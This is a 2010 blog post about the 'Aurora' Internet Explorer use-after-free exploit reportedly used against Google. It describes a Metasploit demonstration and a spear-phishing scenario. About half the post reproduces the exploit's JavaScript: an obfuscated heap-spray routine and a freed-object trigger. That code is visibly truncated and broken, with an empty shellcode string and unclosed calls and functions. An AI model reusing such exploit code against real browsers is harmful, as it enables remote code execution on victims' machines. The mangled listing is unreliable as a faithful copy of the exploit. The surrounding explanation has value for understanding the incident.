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Tuesday, February 2, 2010

How Chinese used “Aurora” IE Exploit Against Google

Google and China were in news last week . Chinese hackers were reported to be involved for hacking in the Google network. In the coming lines we will be discussing how the attack was carried out on the Google network.

Attacker have used the invalid pointer reference vulnerability found in IE 6 , 7 and 8 .They exploited this vulnerability on IE6 .Recently Microsoft has issued an Advisory 979352: saying “In a specially-crafted attack, in attempting to access a freed object, Internet Explorer can be caused to allow remote code execution". This IE vulnerability is called as Aurora .The video below demonstrates how crackers used this Aurora vulnerability with Metasploit to get into Google computers.

The "Aurora" IE Exploit in Action from The Crew of Praetorian Prefect on Vimeo.

Metasploit set up a listening session, set up a web site that serves up the malicious code, and watch as an unsuspecting user visits the web site, triggers the attack that uses the IE vulnerability, and unknowingly opens a connection to a computer owned by the attacker. The attacker then lists the user’s processes, and elects to kill Notepad where the user was working on an important document. IE 6.0 is used, as this is the version Microsoft references as having been used in the “targeted attacks” on some 30+ U.S. companies.once the backdoor is open to the user’s PC the attacker can use it as a pivot point for other attacks against the internal network, escalate his or her privileges, take information off the PC, basically do anything the user can do.

The attack scenario is that users were pointed to a web site (probably through a targeted Spam e-mail, an attack called spear phishing) containing a JavaScript that references this invalid pointer and injects the included shell code. The code below is now released publicly .

var sc = unescape("
var sss = Array(826, 679, 798, 224, 770, 427, 819, 770, 707, 805, 693, 679, 784, 707, 280,
238, 259, 819, 336, 693, 336, 700, 259, 819, 336, 693, 336, 700, 238, 287, 413, 224, 833,
728, 735, 756, 707, 280, 770, 322, 756, 707, 770, 721, 812, 728, 420, 427, 371, 350, 364,
350, 392, 392, 287, 224, 770, 301, 427, 770, 413, 224, 770, 427, 770, 322, 805, 819, 686,
805, 812, 798, 735, 770, 721, 280, 336, 448, 371, 350, 364, 350, 378, 399, 315, 805, 693,
322, 756, 707, 770, 721, 812, 728, 287, 413, 826, 679, 798, 224, 840, 427, 770, 707, 833,
224, 455, 798, 798, 679, 847, 280, 287, 413, 224, 714, 777, 798, 280, 826, 679, 798, 224,
735, 427, 336, 413, 735, 420, 350, 336, 336, 413, 735, 301, 301, 287, 224, 861, 840, 637,
735, 651, 427, 770, 301, 805, 693, 413, 875);
var arr = new Array;
for (var i = 0; i < sss.length; i ++ ){
arr[i] = String.fromCharCode(sss[i]/7); } var cc=arr.toString();cc=cc.replace(/ ,/ g, ""
cc = cc.replace(/@/g, ",");
var x1 = new Array();
for (i = 0; i < 200; i ++ ){
x1[i] = document.createElement("COMMENT");
x1[i].data = "abc";
var e1 = null;
function ev1(evt){
e1 = document.createEventObject(evt);
document.getElementById("sp1").innerHTML = "";
window.setInterval(ev2, 50);
function ev2(){
p = "
for (i = 0; i < x1.length; i ++ ){
x1[i].data = p;
var t = e1.srcElement;

Click here for more details

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